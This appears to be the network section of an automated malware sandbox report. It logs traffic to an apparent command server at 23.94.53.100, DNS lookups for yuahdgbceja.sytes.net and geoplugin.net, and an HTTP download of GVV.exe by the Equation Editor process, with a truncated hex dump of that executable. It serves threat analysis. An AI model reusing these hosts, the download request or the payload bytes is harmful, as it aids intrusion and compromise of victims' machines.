                                                                                                                                              May 2, 2024 04:57:13.356756926 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356770992 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356781960 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356794119 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356825113 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356828928 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.356828928 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.356861115 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356873035 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356898069 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.356899977 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356913090 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356959105 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.356992006 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.356992006 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.357244015 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.438922882 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.438947916 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.438986063 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.438999891 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439012051 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439024925 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439040899 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439048052 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439073086 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439085007 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439096928 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439107895 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439119101 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439132929 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439163923 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439163923 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439163923 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439163923 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439163923 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439240932 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439256907 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439269066 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439281940 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439301968 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439301968 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439311981 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439325094 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.439376116 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.439979076 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440000057 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440023899 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440080881 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440109015 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440128088 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.440128088 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.440143108 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440161943 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.440167904 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440223932 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.440238953 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440253019 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440280914 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440293074 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440330982 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.440331936 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.440331936 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.447586060 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.447613955 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.447665930 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.456877947 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.456899881 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.456943989 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.456965923 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457017899 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457067013 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457067013 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457067966 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457067013 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457098961 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457148075 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457159042 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457197905 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457253933 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457303047 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457319975 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457367897 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457376957 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457434893 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457456112 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457490921 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457504034 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457549095 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457564116 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457623005 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457659006 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457684994 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457698107 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457772017 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457775116 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457788944 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457824945 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457870007 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.457874060 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457896948 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457937002 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.457942963 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458002090 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458009958 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458055019 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458096027 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458137035 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458157063 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458209038 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458257914 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458306074 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458388090 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458404064 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458508968 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458597898 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458611012 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458667994 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458739042 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458765984 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458811998 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458868980 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.458906889 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.458986044 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459021091 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.459078074 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459105968 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459151030 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.459197044 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459254026 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459319115 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459417105 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459429979 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.459460020 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.459527969 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459542036 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459566116 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.459599972 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.459820032 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464179039 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464200020 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464241028 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464281082 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464303970 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464334965 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464334965 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464361906 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464387894 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464400053 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464420080 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464442015 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464442015 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464449883 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464484930 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464509964 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464550018 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464550018 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.464554071 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464576960 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.464628935 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.468905926 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.479914904 CEST8049184178.237.33.50192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.479990005 CEST4918480192.168.2.22178.237.33.50
                                                                                                                                              May 2, 2024 04:57:13.480273008 CEST4918480192.168.2.22178.237.33.50
                                                                                                                                              May 2, 2024 04:57:13.594847918 CEST44349181172.217.1.4192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.594934940 CEST44349181172.217.1.4192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.595041990 CEST49181443192.168.2.22172.217.1.4
                                                                                                                                              May 2, 2024 04:57:13.649221897 CEST8049184178.237.33.50192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.649856091 CEST4918480192.168.2.22178.237.33.50
                                                                                                                                              May 2, 2024 04:57:13.699637890 CEST491822766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:13.861217022 CEST27664918223.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:14.649311066 CEST8049184178.237.33.50192.168.2.22
                                                                                                                                              May 2, 2024 04:57:14.649369001 CEST4918480192.168.2.22178.237.33.50
                                                                                                                                              May 2, 2024 04:57:18.728558064 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:18.838886023 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:18.839020014 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:18.949125051 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:18.949188948 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:18.949278116 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:19.059248924 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.059322119 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.059510946 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.059545040 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:19.059752941 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.170032978 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.173427105 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              May 2, 2024 04:57:19.173499107 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:19.189762115 CEST491832766192.168.2.2223.94.53.100
                                                                                                                                              May 2, 2024 04:57:19.299705982 CEST27664918323.94.53.100192.168.2.22
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              May 2, 2024 04:55:54.835239887 CEST138138192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:55:58.813317060 CEST5291753192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:55:58.813500881 CEST6275153192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:55:58.904262066 CEST53529178.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:55:58.904740095 CEST53627518.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:03.388657093 CEST53547198.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:03.390331984 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:56:03.583270073 CEST4988153192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:56:03.583420992 CEST5499853192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:56:03.677237988 CEST53498818.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:03.677854061 CEST53549988.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:03.827219009 CEST53626728.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:04.139456034 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:56:04.889533997 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:56:10.005088091 CEST53581058.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:29.505350113 CEST53616188.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:36.228960991 CEST53634698.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:47.135312080 CEST53649568.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:56:58.716480970 CEST53650848.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:57:06.048381090 CEST53510148.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:57:10.524168015 CEST5306053192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:57:10.621205091 CEST53530608.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:57:13.203659058 CEST4994953192.168.2.228.8.8.8
                                                                                                                                              May 2, 2024 04:57:13.302244902 CEST53499498.8.8.8192.168.2.22
                                                                                                                                              May 2, 2024 04:57:17.800558090 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:57:18.547076941 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              May 2, 2024 04:57:19.311418056 CEST137137192.168.2.22192.168.2.255
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              May 2, 2024 04:55:58.813317060 CEST192.168.2.228.8.8.80x4abStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:55:58.813500881 CEST192.168.2.228.8.8.80x4ee6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              May 2, 2024 04:56:03.583270073 CEST192.168.2.228.8.8.80xe006Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:56:03.583420992 CEST192.168.2.228.8.8.80xee75Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              May 2, 2024 04:57:10.524168015 CEST192.168.2.228.8.8.80x88b6Standard query (0)yuahdgbceja.sytes.netA (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:57:13.203659058 CEST192.168.2.228.8.8.80x3989Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              May 2, 2024 04:55:58.904262066 CEST8.8.8.8192.168.2.220x4abNo error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:55:58.904740095 CEST8.8.8.8192.168.2.220x4ee6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              May 2, 2024 04:56:03.677237988 CEST8.8.8.8192.168.2.220xe006No error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:56:03.677854061 CEST8.8.8.8192.168.2.220xee75No error (0)www.google.com65IN (0x0001)false
                                                                                                                                              May 2, 2024 04:57:10.621205091 CEST8.8.8.8192.168.2.220x88b6No error (0)yuahdgbceja.sytes.net23.94.53.100A (IP address)IN (0x0001)false
                                                                                                                                              May 2, 2024 04:57:13.302244902 CEST8.8.8.8192.168.2.220x3989No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                              • www.google.com
                                                                                                                                              • 23.94.54.101
                                                                                                                                              • geoplugin.net
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.224916123.94.54.10180800C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              May 2, 2024 04:54:52.973706007 CEST69OUTGET /GVV.exe HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Host: 23.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.083898067 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Last-Modified: Thu, 02 May 2024 08:28:48 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              ETag: W/"4ca767c16a9cda1:0"
                                                                                                                                              Server: Microsoft-IIS/8.5
                                                                                                                                              Date: Thu, 02 May 2024 02:54:52 GMT
                                                                                                                                              Content-Length: 1402368
                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e5 c1 32 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 b6 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL2f"w@@@@d|@@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocu@v@B [TRUNCATED]
                                                                                                                                              May 2, 2024 04:54:53.083945990 CEST1289INData Raw: 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8
                                                                                                                                              Data Ascii: Yh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
                                                                                                                                              May 2, 2024 04:54:53.084021091 CEST1289INData Raw: c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c
                                                                                                                                              Data Ascii: O_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                                                                                                                              May 2, 2024 04:54:53.084146023 CEST1289INData Raw: 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2
                                                                                                                                              Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF
                                                                                                                                              May 2, 2024 04:54:53.193768978 CEST1289INData Raw: 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56
                                                                                                                                              Data Ascii: x3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
                                                                                                                                              May 2, 2024 04:54:53.193792105 CEST1289INData Raw: fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85
                                                                                                                                              Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
                                                                                                                                              May 2, 2024 04:54:53.193803072 CEST1289INData Raw: 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a
                                                                                                                                              Data Ascii: }}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU
                                                                                                                                              May 2, 2024 04:54:53.193815947 CEST1289INData Raw: 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d
                                                                                                                                              Data Ascii: {uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
